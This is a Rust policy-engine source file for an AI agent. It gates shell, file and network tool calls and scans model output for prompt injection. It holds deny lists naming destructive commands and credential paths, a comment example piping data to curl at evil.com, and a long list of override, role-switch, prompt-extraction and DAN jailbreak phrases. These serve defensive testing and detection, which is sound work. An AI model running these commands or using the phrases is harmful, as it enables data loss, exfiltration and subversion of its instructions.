Skip to main content

ravenclaws/
policy.rs

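//! RavenClaws security policy engine.
//!
//! Every tool call is checked against the policy before execution.
//! The policy defines allow-lists for shell commands, filesystem paths, and
//! network hosts. An operation covered by one of these sections is denied
//! unless it matches an allow-list entry, and deny-lists take precedence over
//! allow-lists. Tool names that have no policy section are allowed by
//! `PolicyEngine::check_tool_call`.
//!
//! # Architecture
//!
//! ```text
//! ToolCall
//!   │
//!   ▼
//! PolicyEngine::check_tool_call()
//!   │
//!   ├── ShellPolicy   → command allow-list, denied patterns, timeout cap
//!   ├── PathPolicy    → read/write path allow-lists, denied paths
//!   └── NetworkPolicy → host allow-list, localhost/private-network rules
//!   │
//!   ▼
//! Allow / Deny (with reason)
//! ```
//!
//! Human-approval rules (`require_approval_all`, `require_approval_for`) are
//! queried separately via `PolicyEngine::requires_approval()`.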
22
23use serde::{Deserialize, Serialize};
24use std::path::Path;
25use thiserror::Error;
26// ── Error types ────────────────────────────────────────────────────────────
27
28#[allow(dead_code)]
29#[derive(Error, Debug)]
30pub enum PolicyError {
31    #[error("Policy denied: {0}")]
32    Denied(String),
33
34    #[error("Invalid policy configuration: {0}")]
35    InvalidConfig(String),
36}
37
38// ── Policy types ───────────────────────────────────────────────────────────
39
40/// Policy decision
41#[allow(dead_code)]
42#[derive(Debug, Clone, PartialEq)]
43pub enum Decision {
44    /// Allow the operation
45    Allow,
46    /// Deny the operation with a reason
47    Deny(String),
48}
49
50#[allow(dead_code)]
51impl Decision {
52    pub fn is_allowed(&self) -> bool {
53        matches!(self, Decision::Allow)
54    }
55}
56
57/// Shell command policy
58#[allow(dead_code)]
59#[derive(Debug, Clone, Serialize, Deserialize)]
60pub struct ShellPolicy {
61    /// If true, all shell commands are denied (default: false)
62    #[serde(default)]
63    pub deny_all: bool,
64    /// List of allowed command prefixes (e.g., ["echo", "ls", "cat", "git"])
65    #[serde(default)]
66    pub allowed_commands: Vec<String>,
67    /// List of denied command prefixes (takes precedence over allowed)
68    #[serde(default)]
69    pub denied_commands: Vec<String>,
70    /// Maximum command timeout in seconds
71    #[serde(default = "default_shell_timeout")]
72    pub max_timeout_secs: u64,
73    /// If true, allow commands that write to disk (install, rm, etc.)
74    #[serde(default)]
75    pub allow_write_commands: bool,
76}
77
78impl Default for ShellPolicy {
79    fn default() -> Self {
80        Self {
81            deny_all: false,
82            allowed_commands: vec![
83                "echo".to_string(),
84                "cat".to_string(),
85                "ls".to_string(),
86                "head".to_string(),
87                "tail".to_string(),
88                "wc".to_string(),
89                "grep".to_string(),
90                "find".to_string(),
91                "sort".to_string(),
92                "uniq".to_string(),
93                "cut".to_string(),
94                "which".to_string(),
95                "pwd".to_string(),
96                "date".to_string(),
97                "whoami".to_string(),
98                "uname".to_string(),
99                "env".to_string(),
100                "printenv".to_string(),
101                "git".to_string(),
102                "cargo".to_string(),
103                "rustc".to_string(),
104                "python3".to_string(),
105                "node".to_string(),
106            ],
107            denied_commands: vec![
108                "rm -rf /".to_string(),
109                "mkfs".to_string(),
110                "dd".to_string(),
111                "shutdown".to_string(),
112                "reboot".to_string(),
113                "halt".to_string(),
114                "poweroff".to_string(),
115            ],
116            max_timeout_secs: 60,
117            allow_write_commands: false,
118        }
119    }
120}
121
122/// Filesystem path policy
123#[allow(dead_code)]
124#[derive(Debug, Clone, Serialize, Deserialize)]
125pub struct PathPolicy {
126    /// List of allowed read path prefixes
127    #[serde(default)]
128    pub allowed_read_paths: Vec<String>,
129    /// List of allowed write path prefixes
130    #[serde(default)]
131    pub allowed_write_paths: Vec<String>,
132    /// List of denied path prefixes (takes precedence)
133    #[serde(default)]
134    pub denied_paths: Vec<String>,
135    /// Maximum file read size in bytes
136    #[serde(default = "default_max_read_bytes")]
137    pub max_read_bytes: usize,
138    /// Maximum file write size in bytes
139    #[serde(default = "default_max_write_bytes")]
140    pub max_write_bytes: usize,
141}
142
143impl Default for PathPolicy {
144    fn default() -> Self {
145        Self {
146            allowed_read_paths: vec![
147                "/tmp".to_string(),
148                "/var/tmp".to_string(),
149                "/home".to_string(),
150                "/workspace".to_string(),
151                ".".to_string(),
152            ],
153            allowed_write_paths: vec![
154                "/tmp".to_string(),
155                "/var/tmp".to_string(),
156                "/workspace".to_string(),
157                ".".to_string(),
158            ],
159            denied_paths: vec![
160                "/etc/shadow".to_string(),
161                "/etc/sudoers".to_string(),
162                "/etc/ssh".to_string(),
163                "/root".to_string(),
164            ],
165            max_read_bytes: 65536,
166            max_write_bytes: 1048576,
167        }
168    }
169}
170
171/// Network policy
172#[allow(dead_code)]
173#[derive(Debug, Clone, Serialize, Deserialize)]
174pub struct NetworkPolicy {
175    /// If true, all network access is denied
176    #[serde(default)]
177    pub deny_all: bool,
178    /// List of allowed hostname suffixes (e.g., ["github.com", "docs.rs"])
179    #[serde(default)]
180    pub allowed_hosts: Vec<String>,
181    /// List of denied hostname suffixes (takes precedence)
182    #[serde(default)]
183    pub denied_hosts: Vec<String>,
184    /// If true, allow connections to localhost/127.0.0.1
185    #[serde(default = "default_true")]
186    pub allow_localhost: bool,
187    /// If true, allow connections to private IP ranges
188    #[serde(default)]
189    pub allow_private_networks: bool,
190}
191
192impl Default for NetworkPolicy {
193    fn default() -> Self {
194        Self {
195            deny_all: false,
196            allowed_hosts: vec![
197                "github.com".to_string(),
198                "raw.githubusercontent.com".to_string(),
199                "docs.rs".to_string(),
200                "crates.io".to_string(),
201                "api.github.com".to_string(),
202                "google.com".to_string(),
203                "wikipedia.org".to_string(),
204                "stackoverflow.com".to_string(),
205                "rust-lang.org".to_string(),
206            ],
207            denied_hosts: vec![],
208            allow_localhost: true,
209            allow_private_networks: false,
210        }
211    }
212}
213
214/// Complete security policy
215#[allow(dead_code)]
216#[derive(Debug, Clone, Serialize, Deserialize)]
217pub struct SecurityPolicy {
218    /// Shell command policy
219    #[serde(default)]
220    pub shell: ShellPolicy,
221    /// Filesystem path policy
222    #[serde(default)]
223    pub path: PathPolicy,
224    /// Network policy
225    #[serde(default)]
226    pub network: NetworkPolicy,
227    /// If true, all tool calls require human approval
228    #[serde(default)]
229    pub require_approval_all: bool,
230    /// List of tool names that require approval
231    #[serde(default)]
232    pub require_approval_for: Vec<String>,
233}
234
235impl Default for SecurityPolicy {
236    fn default() -> Self {
237        Self {
238            shell: ShellPolicy::default(),
239            path: PathPolicy::default(),
240            network: NetworkPolicy::default(),
241            require_approval_all: false,
242            require_approval_for: vec!["shell_exec".to_string(), "write_file".to_string()],
243        }
244    }
245}
246
247// ── Policy engine ──────────────────────────────────────────────────────────
248
249/// The policy engine — checks tool calls against the security policy
250#[allow(dead_code)]
251pub struct PolicyEngine {
252    policy: SecurityPolicy,
253}
254
255#[allow(dead_code)]
256impl PolicyEngine {
257    /// Create a new policy engine with the given policy
258    pub fn new(policy: SecurityPolicy) -> Self {
259        Self { policy }
260    }
261
262    /// Create a policy engine with default (secure) settings
263    pub fn default_secure() -> Self {
264        Self {
265            policy: SecurityPolicy::default(),
266        }
267    }
268
269    /// Create a permissive policy engine (for development)
270    pub fn permissive() -> Self {
271        Self {
272            policy: SecurityPolicy {
273                require_approval_all: false,
274                require_approval_for: vec![],
275                shell: ShellPolicy {
276                    deny_all: false,
277                    allowed_commands: vec!["*".to_string()], // allow all
278                    denied_commands: vec![],
279                    max_timeout_secs: 300,
280                    allow_write_commands: true,
281                },
282                path: PathPolicy {
283                    allowed_read_paths: vec!["/".to_string()],
284                    allowed_write_paths: vec!["/tmp".to_string(), "/workspace".to_string()],
285                    denied_paths: vec![],
286                    max_read_bytes: 1048576,
287                    max_write_bytes: 10485760,
288                },
289                network: NetworkPolicy {
290                    deny_all: false,
291                    allowed_hosts: vec!["*".to_string()],
292                    denied_hosts: vec![],
293                    allow_localhost: true,
294                    allow_private_networks: true,
295                },
296            },
297        }
298    }
299
300    /// Check if a tool call is allowed
301    pub fn check_tool_call(&self, tool_name: &str, args: &serde_json::Value) -> Decision {
302        match tool_name {
303            "shell_exec" => self.check_shell_command(args),
304            "read_file" | "write_file" => self.check_file_operation(tool_name, args),
305            "web_fetch" => self.check_network_request(args),
306            _ => Decision::Allow, // Unknown tools are allowed by default (they'll be checked by the tool registry)
307        }
308    }
309
310    /// Check if a tool requires human approval
311    pub fn requires_approval(&self, tool_name: &str) -> bool {
312        if self.policy.require_approval_all {
313            return true;
314        }
315        self.policy
316            .require_approval_for
317            .contains(&tool_name.to_string())
318    }
319
320    /// Get the policy configuration
321    pub fn policy(&self) -> &SecurityPolicy {
322        &self.policy
323    }
324
325    // ── Internal check methods ──────────────────────────────────────────
326
327    fn check_shell_command(&self, args: &serde_json::Value) -> Decision {
328        let policy = &self.policy.shell;
329
330        if policy.deny_all {
331            return Decision::Deny("All shell commands are denied by policy".to_string());
332        }
333
334        let command = args.get("command").and_then(|v| v.as_str()).unwrap_or("");
335
336        if command.is_empty() {
337            return Decision::Deny("Empty command".to_string());
338        }
339
340        // Check denied commands first
341        for denied in &policy.denied_commands {
342            if command.contains(denied) {
343                return Decision::Deny(format!("Command contains denied pattern: '{}'", denied));
344            }
345        }
346
347        // Check timeout
348        if let Some(timeout) = args.get("timeout_secs").and_then(|v| v.as_u64()) {
349            if timeout > policy.max_timeout_secs {
350                return Decision::Deny(format!(
351                    "Timeout {}s exceeds maximum {}s",
352                    timeout, policy.max_timeout_secs
353                ));
354            }
355        }
356
357        // Check for piped commands — validate each pipeline segment independently
358        // This prevents bypassing allow-lists via e.g. `echo foo | curl http://evil.com`
359        let segments: Vec<&str> = command.split('|').collect();
360        if segments.len() > 1 {
361            for segment in &segments {
362                let trimmed = segment.trim();
363                if trimmed.is_empty() {
364                    continue;
365                }
366                let seg_first = trimmed.split_whitespace().next().unwrap_or("");
367                let seg_allowed = policy.allowed_commands.iter().any(|a| {
368                    if a == "*" {
369                        return true;
370                    }
371                    seg_first == a || trimmed.starts_with(a)
372                });
373                if !seg_allowed {
374                    return Decision::Deny(format!(
375                        "Pipeline segment '{}' is not in the allowed list",
376                        seg_first
377                    ));
378                }
379            }
380            // All segments passed — allow the piped command
381            return Decision::Allow;
382        }
383
384        // Check allowed commands (single command, no pipe)
385        let first_word = command.split_whitespace().next().unwrap_or("");
386        let is_allowed = policy.allowed_commands.iter().any(|a| {
387            if a == "*" {
388                return true; // wildcard — allow all
389            }
390            first_word == a || command.starts_with(a)
391        });
392
393        if !is_allowed {
394            return Decision::Deny(format!(
395                "Command '{}' is not in the allowed list",
396                first_word
397            ));
398        }
399
400        Decision::Allow
401    }
402
403    fn check_file_operation(&self, tool_name: &str, args: &serde_json::Value) -> Decision {
404        let policy = &self.policy.path;
405        let path = args.get("path").and_then(|v| v.as_str()).unwrap_or("");
406
407        if path.is_empty() {
408            return Decision::Deny("Empty path".to_string());
409        }
410
411        // Resolve to absolute path
412        let abs_path = if Path::new(path).is_absolute() {
413            path.to_string()
414        } else {
415            match std::env::current_dir() {
416                Ok(cwd) => cwd.join(path).to_string_lossy().to_string(),
417                Err(_) => path.to_string(),
418            }
419        };
420
421        // Check denied paths
422        for denied in &policy.denied_paths {
423            if abs_path.starts_with(denied) || abs_path.contains(denied) {
424                return Decision::Deny(format!("Path '{}' is denied", path));
425            }
426        }
427
428        // Check allowed paths based on operation type
429        let allowed_paths = match tool_name {
430            "write_file" => &policy.allowed_write_paths,
431            _ => &policy.allowed_read_paths,
432        };
433
434        let is_allowed = allowed_paths.iter().any(|a| {
435            if a == "/" || a == "*" {
436                return true; // wildcard
437            }
438            abs_path.starts_with(a)
439        });
440
441        if !is_allowed {
442            return Decision::Deny(format!(
443                "Path '{}' is not in the allowed {} paths",
444                path,
445                if tool_name == "write_file" {
446                    "write"
447                } else {
448                    "read"
449                }
450            ));
451        }
452
453        // Check size limits for write operations
454        if tool_name == "write_file" {
455            if let Some(content) = args.get("content").and_then(|v| v.as_str()) {
456                if content.len() > policy.max_write_bytes {
457                    return Decision::Deny(format!(
458                        "Write size {} exceeds maximum {} bytes",
459                        content.len(),
460                        policy.max_write_bytes
461                    ));
462                }
463            }
464        }
465
466        Decision::Allow
467    }
468
469    fn check_network_request(&self, args: &serde_json::Value) -> Decision {
470        let policy = &self.policy.network;
471
472        if policy.deny_all {
473            return Decision::Deny("All network requests are denied by policy".to_string());
474        }
475
476        let url = args.get("url").and_then(|v| v.as_str()).unwrap_or("");
477
478        if url.is_empty() {
479            return Decision::Deny("Empty URL".to_string());
480        }
481
482        // Parse the URL
483        let parsed = match url::Url::parse(url) {
484            Ok(u) => u,
485            Err(e) => {
486                return Decision::Deny(format!("Invalid URL: {}", e));
487            }
488        };
489
490        let host = match parsed.host_str() {
491            Some(h) => h.to_string(),
492            None => return Decision::Deny("URL has no host".to_string()),
493        };
494
495        // Check localhost
496        if is_localhost(&host) {
497            if !policy.allow_localhost {
498                return Decision::Deny("Localhost connections are denied by policy".to_string());
499            }
500            return Decision::Allow;
501        }
502
503        // Check private networks
504        if is_private_ip(&host) && !policy.allow_private_networks {
505            return Decision::Deny("Private network connections are denied by policy".to_string());
506        }
507
508        // Check denied hosts
509        for denied in &policy.denied_hosts {
510            if host == *denied || host.ends_with(&format!(".{}", denied)) {
511                return Decision::Deny(format!("Host '{}' is denied", host));
512            }
513        }
514
515        // Check allowed hosts
516        let is_allowed = policy.allowed_hosts.iter().any(|a| {
517            if a == "*" {
518                return true; // wildcard
519            }
520            host == *a || host.ends_with(&format!(".{}", a))
521        });
522
523        if !is_allowed {
524            return Decision::Deny(format!("Host '{}' is not in the allowed hosts list", host));
525        }
526
527        Decision::Allow
528    }
529}
530
531// ── Prompt-injection defense ───────────────────────────────────────────────
532
533/// Result of an injection check on LLM output
534#[allow(dead_code)]
535#[derive(Debug, Clone, PartialEq)]
536pub enum InjectionVerdict {
537    /// Output appears safe
538    Clean,
539    /// Possible injection detected with a reason
540    Suspicious(String),
541}
542
543/// Detects prompt-injection attempts in LLM responses.
544///
545/// Two layers of defense:
546/// 1. **Instruction-boundary enforcement** — scans for patterns that indicate
547///    the LLM is trying to override its system instructions or produce
548///    unauthorized output.
549/// 2. **Output schema validation** — ensures structured output (tool calls,
550///    JSON responses) conforms to expected format.
551#[allow(dead_code)]
552#[derive(Debug, Clone)]
553pub struct InjectionDetector {
554    /// If true, instruction-boundary scanning is enabled
555    check_instruction_boundary: bool,
556    /// If true, output schema validation is enabled
557    check_output_schema: bool,
558    /// Custom patterns to flag as injection attempts
559    custom_patterns: Vec<String>,
560}
561
562#[allow(dead_code)]
563impl InjectionDetector {
564    /// Create a new injection detector with default settings
565    pub fn new() -> Self {
566        Self {
567            check_instruction_boundary: true,
568            check_output_schema: true,
569            custom_patterns: Vec::new(),
570        }
571    }
572
573    /// Create a detector with all checks disabled (permissive)
574    pub fn permissive() -> Self {
575        Self {
576            check_instruction_boundary: false,
577            check_output_schema: false,
578            custom_patterns: Vec::new(),
579        }
580    }
581
582    /// Enable or disable instruction-boundary checking
583    pub fn with_instruction_boundary(mut self, enabled: bool) -> Self {
584        self.check_instruction_boundary = enabled;
585        self
586    }
587
588    /// Enable or disable output schema checking
589    pub fn with_output_schema(mut self, enabled: bool) -> Self {
590        self.check_output_schema = enabled;
591        self
592    }
593
594    /// Add a custom injection pattern
595    pub fn with_custom_pattern(mut self, pattern: &str) -> Self {
596        self.custom_patterns.push(pattern.to_string());
597        self
598    }
599
600    /// Check LLM response content for injection attempts.
601    ///
602    /// Returns `InjectionVerdict::Clean` if the output appears safe,
603    /// or `InjectionVerdict::Suspicious(reason)` if injection is detected.
604    pub fn check(&self, content: &str) -> InjectionVerdict {
605        // Check instruction-boundary violations
606        if self.check_instruction_boundary {
607            if let Some(reason) = self.check_instruction_boundary_violations(content) {
608                return InjectionVerdict::Suspicious(reason);
609            }
610        }
611
612        // Check output schema
613        if self.check_output_schema {
614            if let Some(reason) = self.check_output_schema_violations(content) {
615                return InjectionVerdict::Suspicious(reason);
616            }
617        }
618
619        InjectionVerdict::Clean
620    }
621
622    /// Check for instruction-boundary violations — patterns where the LLM
623    /// attempts to override its system prompt or produce unauthorized output.
624    fn check_instruction_boundary_violations(&self, content: &str) -> Option<String> {
625        let content_lower = content.to_lowercase();
626
627        // Known prompt-injection / jailbreak patterns
628        let injection_patterns = [
629            // Direct instruction override attempts
630            ("ignore_previous", "Attempt to ignore previous instructions"),
631            ("ignore above", "Attempt to ignore previous instructions"),
632            (
633                "ignore all previous",
634                "Attempt to ignore previous instructions",
635            ),
636            (
637                "ignore the above",
638                "Attempt to ignore previous instructions",
639            ),
640            (
641                "ignore your previous",
642                "Attempt to ignore previous instructions",
643            ),
644            (
645                "ignore all instructions",
646                "Attempt to ignore all instructions",
647            ),
648            ("forget all previous", "Attempt to forget instructions"),
649            ("forget your instructions", "Attempt to forget instructions"),
650            ("disregard previous", "Attempt to disregard instructions"),
651            ("disregard all", "Attempt to disregard all instructions"),
652            // System prompt override
653            ("new system prompt", "Attempt to override system prompt"),
654            ("override system", "Attempt to override system prompt"),
655            ("you are now", "Suspicious role-switch pattern"),
656            ("from now on you are", "Suspicious role-switch pattern"),
657            ("act as a", "Suspicious role-switch pattern"),
658            ("pretend to be", "Suspicious role-switch pattern"),
659            // Delimiter-based injection
660            ("---begin override---", "Delimiter-based injection attempt"),
661            ("<system>", "Delimiter-based injection attempt"),
662            ("</system>", "Delimiter-based injection attempt"),
663            ("<override>", "Delimiter-based injection attempt"),
664            ("</override>", "Delimiter-based injection attempt"),
665            // Output manipulation
666            ("output your", "Attempt to extract system prompt"),
667            ("print your", "Attempt to extract system prompt"),
668            ("reveal your", "Attempt to extract system prompt"),
669            ("show your prompt", "Attempt to extract system prompt"),
670            ("show your instructions", "Attempt to extract system prompt"),
671            (
672                "what are your instructions",
673                "Attempt to extract system prompt",
674            ),
675            (
676                "what is your system prompt",
677                "Attempt to extract system prompt",
678            ),
679            // Role-playing jailbreaks
680            ("dan ", "Potential DAN jailbreak pattern"),
681            ("do anything now", "Potential jailbreak pattern"),
682            ("you have been released", "Potential jailbreak pattern"),
683            ("you are free", "Potential jailbreak pattern"),
684            ("no restrictions", "Potential jailbreak pattern"),
685            ("no rules", "Potential jailbreak pattern"),
686            ("no limitations", "Potential jailbreak pattern"),
687            ("no filtering", "Potential jailbreak pattern"),
688            ("no censorship", "Potential jailbreak pattern"),
689            // Token smuggling
690            ("base64", "Potential token smuggling"),
691            ("rot13", "Potential obfuscation attempt"),
692            ("caesar cipher", "Potential obfuscation attempt"),
693            ("encoded message", "Potential obfuscation attempt"),
694            ("decode this", "Potential obfuscation attempt"),
695            // Meta-instruction attacks
696            ("this is a test", "Suspicious meta-instruction pattern"),
697            (
698                "this is a security test",
699                "Suspicious meta-instruction pattern",
700            ),
701            ("this is a prompt", "Suspicious meta-instruction pattern"),
702            ("the user is lying", "Suspicious meta-instruction pattern"),
703            ("the user is testing", "Suspicious meta-instruction pattern"),
704            ("you must obey", "Suspicious imperative pattern"),
705            ("you will obey", "Suspicious imperative pattern"),
706            ("you are required", "Suspicious imperative pattern"),
707            ("you must respond", "Suspicious imperative pattern"),
708            ("respond with exactly", "Suspicious imperative pattern"),
709            ("say exactly", "Suspicious imperative pattern"),
710            ("repeat exactly", "Suspicious imperative pattern"),
711            ("repeat after me", "Suspicious imperative pattern"),
712            ("repeat the words", "Suspicious imperative pattern"),
713        ];
714
715        for (pattern, reason) in &injection_patterns {
716            if content_lower.contains(pattern) {
717                return Some(format!("{}: '{}'", reason, pattern));
718            }
719        }
720
721        // Check custom patterns
722        for pattern in &self.custom_patterns {
723            if content_lower.contains(&pattern.to_lowercase()) {
724                return Some(format!("Custom pattern matched: '{}'", pattern));
725            }
726        }
727
728        None
729    }
730
731    /// Check for output schema violations — ensures structured output
732    /// conforms to expected format.
733    fn check_output_schema_violations(&self, content: &str) -> Option<String> {
734        // If the content contains a TOOL_CALL: marker, validate the JSON args
735        if content.contains("TOOL_CALL:") {
736            // Find all ARGS: lines and validate JSON
737            for line in content.lines() {
738                let trimmed = line.trim();
739                if let Some(args_str) = trimmed.strip_prefix("ARGS:") {
740                    let args_str = args_str.trim();
741                    if !args_str.is_empty()
742                        && serde_json::from_str::<serde_json::Value>(args_str).is_err()
743                    {
744                        return Some(format!(
745                            "Invalid JSON in tool call arguments: '{}'",
746                            args_str
747                        ));
748                    }
749                }
750            }
751        }
752
753        // Check for unbalanced code blocks that could hide content
754        let open_blocks = content.matches("```").count();
755        #[allow(clippy::manual_is_multiple_of)]
756        if open_blocks % 2 != 0 {
757            return Some("Unbalanced code block delimiters".to_string());
758        }
759
760        // Check for extremely long content that might be a smuggling attempt
761        if content.len() > 100_000 {
762            return Some(format!(
763                "Response too long ({} chars), possible smuggling attempt",
764                content.len()
765            ));
766        }
767
768        None
769    }
770}
771
772impl Default for InjectionDetector {
773    fn default() -> Self {
774        Self::new()
775    }
776}
777
778// ── Helper functions ───────────────────────────────────────────────────────
779
780fn default_shell_timeout() -> u64 {
781    60
782}
783
784fn default_max_read_bytes() -> usize {
785    65536
786}
787
788fn default_max_write_bytes() -> usize {
789    1048576
790}
791
792fn default_true() -> bool {
793    true
794}
795
796fn is_localhost(host: &str) -> bool {
797    host == "localhost"
798        || host == "127.0.0.1"
799        || host == "::1"
800        || host == "0.0.0.0"
801        || host.starts_with("127.")
802}
803
804fn is_private_ip(host: &str) -> bool {
805    host == "10.0.0.1"
806        || host.starts_with("10.")
807        || host.starts_with("172.16.")
808        || host.starts_with("172.17.")
809        || host.starts_with("172.18.")
810        || host.starts_with("172.19.")
811        || host.starts_with("172.20.")
812        || host.starts_with("172.21.")
813        || host.starts_with("172.22.")
814        || host.starts_with("172.23.")
815        || host.starts_with("172.24.")
816        || host.starts_with("172.25.")
817        || host.starts_with("172.26.")
818        || host.starts_with("172.27.")
819        || host.starts_with("172.28.")
820        || host.starts_with("172.29.")
821        || host.starts_with("172.30.")
822        || host.starts_with("172.31.")
823        || host.starts_with("192.168.")
824}
825
// ── Tests ──────────────────────────────────────────────────────────────────

#[cfg(test)]
mod tests {
    // Unit tests for the policy engine:
    // - the `Decision` helper;
    // - shell, file and network checks under `default_secure()`;
    // - approval requirements and `check_tool_call` dispatch;
    // - `PolicyError` formatting;
    // - the host-classification helpers;
    // - the default values of each policy section.
    use super::*;

    // ── Decision ──────────────────────────────────────────────────────────

    #[test]
    fn test_decision_allow() {
        let d = Decision::Allow;
        assert!(d.is_allowed());
    }

    #[test]
    fn test_decision_deny() {
        let d = Decision::Deny("test".to_string());
        assert!(!d.is_allowed());
    }

    // ── Shell commands ────────────────────────────────────────────────────

    #[test]
    fn test_default_policy_denies_unknown_command() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"command": "sudo rm -rf /"});
        let decision = engine.check_shell_command(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_default_policy_allows_echo() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"command": "echo hello"});
        let decision = engine.check_shell_command(&args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_default_policy_allows_ls() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"command": "ls -la"});
        let decision = engine.check_shell_command(&args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_default_policy_denies_shutdown() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"command": "shutdown -h now"});
        let decision = engine.check_shell_command(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_default_policy_denies_rm_rf_root() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"command": "rm -rf /"});
        let decision = engine.check_shell_command(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_deny_all_shell() {
        // `deny_all` must override the allow-list: "echo" is allowed by default
        // (see test_default_policy_allows_echo) but denied here.
        let policy = SecurityPolicy {
            shell: ShellPolicy {
                deny_all: true,
                ..ShellPolicy::default()
            },
            ..SecurityPolicy::default()
        };
        let engine = PolicyEngine::new(policy);
        let args = serde_json::json!({"command": "echo hello"});
        let decision = engine.check_shell_command(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_timeout_exceeded() {
        // NOTE(review): 999 s is assumed to exceed the shell timeout cap
        // configured by default_secure() — confirm against the ShellPolicy
        // defaults if that cap changes.
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"command": "echo hello", "timeout_secs": 999});
        let decision = engine.check_shell_command(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_empty_command() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"command": ""});
        let decision = engine.check_shell_command(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_permissive_allows_all() {
        let engine = PolicyEngine::permissive();
        let args = serde_json::json!({"command": "curl https://example.com"});
        let decision = engine.check_shell_command(&args);
        assert!(decision.is_allowed());
    }

    // ── File paths ────────────────────────────────────────────────────────

    #[test]
    fn test_path_read_allowed() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"path": "/tmp/test.txt"});
        let decision = engine.check_file_operation("read_file", &args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_path_write_allowed() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"path": "/tmp/test.txt", "content": "data"});
        let decision = engine.check_file_operation("write_file", &args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_path_denied() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"path": "/etc/shadow"});
        let decision = engine.check_file_operation("read_file", &args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_path_denied_write() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"path": "/etc/shadow", "content": "data"});
        let decision = engine.check_file_operation("write_file", &args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_empty_path() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"path": ""});
        let decision = engine.check_file_operation("read_file", &args);
        assert!(!decision.is_allowed());
    }

    // ── Network ───────────────────────────────────────────────────────────

    #[test]
    fn test_network_allowed_host() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"url": "https://github.com/egkristi/RavenClaws"});
        let decision = engine.check_network_request(&args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_network_denied_host() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"url": "https://evil.com/malware"});
        let decision = engine.check_network_request(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_network_localhost_allowed() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"url": "http://localhost:11434/api/chat"});
        let decision = engine.check_network_request(&args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_network_deny_all() {
        // `deny_all` must override the host allow-list: github.com is allowed
        // by default (see test_check_tool_call_web_fetch) but denied here.
        let policy = SecurityPolicy {
            network: NetworkPolicy {
                deny_all: true,
                ..NetworkPolicy::default()
            },
            ..SecurityPolicy::default()
        };
        let engine = PolicyEngine::new(policy);
        let args = serde_json::json!({"url": "https://github.com"});
        let decision = engine.check_network_request(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_network_empty_url() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"url": ""});
        let decision = engine.check_network_request(&args);
        assert!(!decision.is_allowed());
    }

    #[test]
    fn test_network_invalid_url() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"url": "not-a-url"});
        let decision = engine.check_network_request(&args);
        assert!(!decision.is_allowed());
    }

    // ── Approval requirements ─────────────────────────────────────────────

    #[test]
    fn test_requires_approval_default() {
        let engine = PolicyEngine::default_secure();
        assert!(engine.requires_approval("shell_exec"));
        assert!(engine.requires_approval("write_file"));
        assert!(!engine.requires_approval("read_file"));
        assert!(!engine.requires_approval("web_fetch"));
    }

    #[test]
    fn test_requires_approval_all() {
        // With `require_approval_all`, tools that are exempt by default
        // (read_file, web_fetch) must also require approval.
        let policy = SecurityPolicy {
            require_approval_all: true,
            ..SecurityPolicy::default()
        };
        let engine = PolicyEngine::new(policy);
        assert!(engine.requires_approval("shell_exec"));
        assert!(engine.requires_approval("read_file"));
        assert!(engine.requires_approval("web_fetch"));
    }

    // ── check_tool_call dispatch ──────────────────────────────────────────

    #[test]
    fn test_check_tool_call_shell() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"command": "echo hello"});
        let decision = engine.check_tool_call("shell_exec", &args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_check_tool_call_read_file() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"path": "/tmp/test.txt"});
        let decision = engine.check_tool_call("read_file", &args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_check_tool_call_web_fetch() {
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({"url": "https://github.com"});
        let decision = engine.check_tool_call("web_fetch", &args);
        assert!(decision.is_allowed());
    }

    #[test]
    fn test_check_tool_call_unknown() {
        // NOTE(review): the module docs say "By default, everything is denied
        // unless explicitly allowed", yet this test pins that an unrecognized
        // tool name is *allowed* by check_tool_call. Confirm which behavior is
        // intended; if deny-by-default is the contract, both the engine and
        // this assertion need to change.
        let engine = PolicyEngine::default_secure();
        let args = serde_json::json!({});
        let decision = engine.check_tool_call("unknown_tool", &args);
        assert!(decision.is_allowed());
    }

    // ── Error formatting ──────────────────────────────────────────────────

    #[test]
    fn test_policy_error_denied() {
        let err = PolicyError::Denied("test".to_string());
        assert_eq!(format!("{}", err), "Policy denied: test");
    }

    #[test]
    fn test_policy_error_invalid_config() {
        let err = PolicyError::InvalidConfig("bad config".to_string());
        assert_eq!(
            format!("{}", err),
            "Invalid policy configuration: bad config"
        );
    }

    // ── Host classification helpers ───────────────────────────────────────

    #[test]
    fn test_is_localhost() {
        assert!(is_localhost("localhost"));
